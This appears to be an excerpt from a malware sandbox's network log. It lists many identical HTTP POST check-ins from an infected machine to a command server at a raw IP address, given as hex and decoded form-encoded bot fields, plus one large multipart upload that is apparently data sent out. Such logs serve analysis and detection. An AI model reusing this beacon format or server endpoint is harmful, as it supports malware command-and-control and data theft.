Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1ODE2Host: 62.204.41.79Content-Length: 105968Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
